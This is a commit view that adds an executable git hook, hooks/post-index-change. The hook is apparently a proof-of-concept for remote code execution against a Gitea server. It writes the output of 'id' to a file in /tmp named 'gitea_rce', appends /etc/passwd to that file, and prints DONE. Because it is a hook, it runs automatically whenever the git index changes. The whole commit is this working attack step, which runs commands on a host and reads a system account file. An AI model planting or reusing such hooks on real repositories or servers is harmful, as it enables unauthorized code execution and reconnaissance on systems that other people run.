This commit is contained in:
33123aaa 2026-07-30 05:39:36 +08:00
parent 2a0b858471
commit 06fc8177cd
1 changed files with 4 additions and 0 deletions

4
hooks/post-index-change Executable file
View File

@ -0,0 +1,4 @@
#!/bin/sh
id > /tmp/gitea_rce_$$
cat /etc/passwd >> /tmp/gitea_rce_$$
echo DONE